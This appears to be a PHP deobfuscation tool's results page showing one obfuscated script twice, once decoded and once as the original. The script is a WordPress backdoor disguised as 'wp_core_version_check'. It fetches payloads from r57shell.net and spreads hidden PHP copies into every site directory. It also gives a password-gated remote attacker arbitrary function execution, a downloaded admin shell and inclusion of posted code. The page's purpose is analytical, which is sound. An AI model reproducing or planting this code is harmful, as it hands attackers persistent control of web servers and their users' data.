Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (!function_exists("wp_core_version_check")) { function wp_core_version_check..
Decoded Output download
<?php if (!function_exists("wp_core_version_check")) {
function wp_core_version_check()
{
goto QHTmE;
ReBbR:
$file_path = dirname($document_file);
goto yxZ6i;
QHTmE:
$document_file = $_SERVER["SCRIPT_FILENAME"];
goto TmK7C;
B8IHf:
$uri_path = $parse_url["path"];
goto DR8d0;
TmK7C:
$request_uri = $_SERVER["REQUEST_URI"];
goto Lhccs;
Sae33:
$hostname = str_replace("www.", "", $_SERVER["HTTP_HOST"]);
goto EmUwt;
yxZ6i:
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
goto TMxaR;
O4NxR:
if (!file_exists($tmp_file)) {
goto Jjyr3;
qVUcF:
@touch($tmp_file);
goto FrbfO;
FrbfO:
@file_put_contents($tmp_file, $response);
goto fUkP_;
Jjyr3:
if (function_exists("curl_init")) {
goto EZy_9;
EZy_9:
$ch = curl_init();
goto VR0Vi;
OFlqh:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto VdcLO;
VR0Vi:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto OFlqh;
DcJlW:
$response = curl_exec($ch);
goto fkRwe;
VdcLO:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]
);
goto DcJlW;
fkRwe:
curl_close($ch);
goto MpMm6;
MpMm6:
} else {
goto Rsl9q;
PQRsR:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto NXRla;
DmscO:
$context = stream_context_create($opts);
goto PQRsR;
Rsl9q:
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
goto vGpwe;
vGpwe:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}
\xa",
],
],
];
goto DmscO;
NXRla:
}
goto qVUcF;
fUkP_:
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
goto Mh1sz;
Mh1sz:
if (function_exists("curl_init")) {
goto DVDkP;
u_SFh:
$response = curl_exec($ch);
goto zDHcZ;
zMTgu:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto AvWVd;
YWAQw:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]
);
goto u_SFh;
DVDkP:
$ch = curl_init();
goto zMTgu;
zDHcZ:
curl_close($ch);
goto v98go;
AvWVd:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto YWAQw;
v98go:
} else {
goto JGb71;
Npbn0:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}
\xa",
],
],
];
goto dtUcU;
JGb71:
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
goto Npbn0;
hCspz:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto XWjW4;
dtUcU:
$context = stream_context_create($opts);
goto hCspz;
XWjW4:
}
goto zkCQa;
zkCQa:
@touch($tmp_file);
goto RL2uX;
RL2uX:
@file_put_contents($tmp_file, $response);
goto Fx07H;
Fx07H:
}
}
goto BXZRC;
EmUwt:
if (is_writable(sys_get_temp_dir())) {
$tmp_file =
sys_get_temp_dir() .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
} else {
$tmp_file =
$file_path .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
}
goto jUXuO;
DR8d0:
$uri_path = dirname($uri_path);
goto ReBbR;
QCYq2:
foreach ($dirs as $d) {
goto DpqP9;
eMOLH:
@file_put_contents($file_name, $response);
goto xQTu4;
xQTu4:
$dirs = array_filter(
glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto KHsZ5;
DpqP9:
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
goto eMOLH;
KHsZ5:
foreach ($dirs as $d) {
if (!@preg_match("#wp-content#", $d)) {
$file_name =
$d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
}
}
goto vTd8M;
vTd8M:
}
goto VCwm6;
jUXuO:
if (@$_GET["slince_golden"]) {
goto qhIqa;
v6_uU:
if (md5(sha1(@$_GET["is"])) == $response) {
goto LNCgX;
LNCgX:
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
goto mNwUE;
mNwUE:
if (@$_GET["m"]) {
goto u3lO9;
u3lO9:
if (function_exists("curl_init")) {
goto h0059;
nzFPK:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/mini_admin.txt"
);
goto SlTBv;
SMEF2:
curl_close($ch);
goto nxTNz;
h0059:
$ch = curl_init();
goto nzFPK;
SlTBv:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto cerjF;
cerjF:
$response = curl_exec($ch);
goto SMEF2;
nxTNz:
} else {
$response = file_get_contents(
"http://r57shell.net/mini_admin.txt"
);
}
goto VIyGz;
oeY1g:
echo $file_name_path;
goto UXu2c;
VIyGz:
$file_name_path = @$_GET["m"] . "gagal.php";
goto xhRaG;
xhRaG:
@file_put_contents($file_name_path, $response);
goto oeY1g;
UXu2c:
}
goto jKG5A;
jKG5A:
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
goto JTclu;
tgcIK:
$tmpf = $tmpf["uri"];
goto z3rep;
vnQ75:
$ret = include $tmpf;
goto Cvaad;
JTclu:g
$tmp = tmpfile();
goto ToYXQ;
ToYXQ:
$tmpf = stream_get_meta_data($tmp);
goto tgcIK;
z3rep:
fwrite($tmp, $request);
goto vnQ75;
aY2Ix:
return $ret;
goto hdvh2;
Cvaad:
fclose($tmp);
goto aY2Ix;
hdvh2:
}
print_r(basic_code_extensions($_POST["l"]));
}
goto ZFcwP;
ZFcwP:
}
goto OlWFN;
OlWFN:
exit();
goto vQOuT;
qhIqa:
echo "<!-- //Silence is golden. -->";
goto q9t4S;
q9t4S:
if (function_exists("curl_init")) {
goto P3bql;
sk_2w:
curl_close($ch);
goto j1BU_;
P3bql:
$ch = curl_init();
goto FA3oh;
FA3oh:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
goto XAilZ;
AJz_6:
$response = curl_exec($ch);
goto sk_2w;
XAilZ:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto AJz_6;
j1BU_:
} else {
$response = file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
}
goto v6_uU;
vQOuT:
}
goto O4NxR;
TMxaR:
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == "") {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, "", $file_path);
}
goto Sae33;
BXZRC:
$dirs = array_filter(
glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto QCYq2;
Lhccs:
$parse_url = parse_url($request_uri);
goto B8IHf;
VCwm6:
}
wp_core_version_check();
} ?>
Did this file decode correctly?
Original Code
<?php if (!function_exists("wp_core_version_check")) {
function wp_core_version_check()
{
goto QHTmE;
ReBbR:
$file_path = dirname($document_file);
goto yxZ6i;
QHTmE:
$document_file = $_SERVER["SCRIPT_FILENAME"];
goto TmK7C;
B8IHf:
$uri_path = $parse_url["path"];
goto DR8d0;
TmK7C:
$request_uri = $_SERVER["REQUEST_URI"];
goto Lhccs;
Sae33:
$hostname = str_replace("www.", "", $_SERVER["HTTP_HOST"]);
goto EmUwt;
yxZ6i:
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
goto TMxaR;
O4NxR:
if (!file_exists($tmp_file)) {
goto Jjyr3;
qVUcF:
@touch($tmp_file);
goto FrbfO;
FrbfO:
@file_put_contents($tmp_file, $response);
goto fUkP_;
Jjyr3:
if (function_exists("curl_init")) {
goto EZy_9;
EZy_9:
$ch = curl_init();
goto VR0Vi;
OFlqh:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto VdcLO;
VR0Vi:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto OFlqh;
DcJlW:
$response = curl_exec($ch);
goto fkRwe;
VdcLO:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]
);
goto DcJlW;
fkRwe:
curl_close($ch);
goto MpMm6;
MpMm6:
} else {
goto Rsl9q;
PQRsR:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto NXRla;
DmscO:
$context = stream_context_create($opts);
goto PQRsR;
Rsl9q:
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
goto vGpwe;
vGpwe:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}
\xa",
],
],
];
goto DmscO;
NXRla:
}
goto qVUcF;
fUkP_:
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
goto Mh1sz;
Mh1sz:
if (function_exists("curl_init")) {
goto DVDkP;
u_SFh:
$response = curl_exec($ch);
goto zDHcZ;
zMTgu:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto AvWVd;
YWAQw:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]
);
goto u_SFh;
DVDkP:
$ch = curl_init();
goto zMTgu;
zDHcZ:
curl_close($ch);
goto v98go;
AvWVd:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto YWAQw;
v98go:
} else {
goto JGb71;
Npbn0:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}
\xa",
],
],
];
goto dtUcU;
JGb71:
$referer = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
goto Npbn0;
hCspz:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto XWjW4;
dtUcU:
$context = stream_context_create($opts);
goto hCspz;
XWjW4:
}
goto zkCQa;
zkCQa:
@touch($tmp_file);
goto RL2uX;
RL2uX:
@file_put_contents($tmp_file, $response);
goto Fx07H;
Fx07H:
}
}
goto BXZRC;
EmUwt:
if (is_writable(sys_get_temp_dir())) {
$tmp_file =
sys_get_temp_dir() .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
} else {
$tmp_file =
$file_path .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
}
goto jUXuO;
DR8d0:
$uri_path = dirname($uri_path);
goto ReBbR;
QCYq2:
foreach ($dirs as $d) {
goto DpqP9;
eMOLH:
@file_put_contents($file_name, $response);
goto xQTu4;
xQTu4:
$dirs = array_filter(
glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto KHsZ5;
DpqP9:
$file_name = $d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
goto eMOLH;
KHsZ5:
foreach ($dirs as $d) {
if (!@preg_match("#wp-content#", $d)) {
$file_name =
$d . DIRECTORY_SEPARATOR . "." . basename($d) . ".php";
@file_put_contents($file_name, $response);
}
}
goto vTd8M;
vTd8M:
}
goto VCwm6;
jUXuO:
if (@$_GET["slince_golden"]) {
goto qhIqa;
v6_uU:
if (md5(sha1(@$_GET["is"])) == $response) {
goto LNCgX;
LNCgX:
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
goto mNwUE;
mNwUE:
if (@$_GET["m"]) {
goto u3lO9;
u3lO9:
if (function_exists("curl_init")) {
goto h0059;
nzFPK:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/mini_admin.txt"
);
goto SlTBv;
SMEF2:
curl_close($ch);
goto nxTNz;
h0059:
$ch = curl_init();
goto nzFPK;
SlTBv:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto cerjF;
cerjF:
$response = curl_exec($ch);
goto SMEF2;
nxTNz:
} else {
$response = file_get_contents(
"http://r57shell.net/mini_admin.txt"
);
}
goto VIyGz;
oeY1g:
echo $file_name_path;
goto UXu2c;
VIyGz:
$file_name_path = @$_GET["m"] . "gagal.php";
goto xhRaG;
xhRaG:
@file_put_contents($file_name_path, $response);
goto oeY1g;
UXu2c:
}
goto jKG5A;
jKG5A:
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
goto JTclu;
tgcIK:
$tmpf = $tmpf["uri"];
goto z3rep;
vnQ75:
$ret = include $tmpf;
goto Cvaad;
JTclu:g
$tmp = tmpfile();
goto ToYXQ;
ToYXQ:
$tmpf = stream_get_meta_data($tmp);
goto tgcIK;
z3rep:
fwrite($tmp, $request);
goto vnQ75;
aY2Ix:
return $ret;
goto hdvh2;
Cvaad:
fclose($tmp);
goto aY2Ix;
hdvh2:
}
print_r(basic_code_extensions($_POST["l"]));
}
goto ZFcwP;
ZFcwP:
}
goto OlWFN;
OlWFN:
exit();
goto vQOuT;
qhIqa:
echo "<!-- //Silence is golden. -->";
goto q9t4S;
q9t4S:
if (function_exists("curl_init")) {
goto P3bql;
sk_2w:
curl_close($ch);
goto j1BU_;
P3bql:
$ch = curl_init();
goto FA3oh;
FA3oh:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
goto XAilZ;
AJz_6:
$response = curl_exec($ch);
goto sk_2w;
XAilZ:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto AJz_6;
j1BU_:
} else {
$response = file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
}
goto v6_uU;
vQOuT:
}
goto O4NxR;
TMxaR:
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == "") {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, "", $file_path);
}
goto Sae33;
BXZRC:
$dirs = array_filter(
glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto QCYq2;
Lhccs:
$parse_url = parse_url($request_uri);
goto B8IHf;
VCwm6:
}
wp_core_version_check();
} ?>
Function Calls
None |
Stats
MD5 | 3864c87b6ac093d346d93a52e6326bba |
Eval Count | 0 |
Decode Time | 67 ms |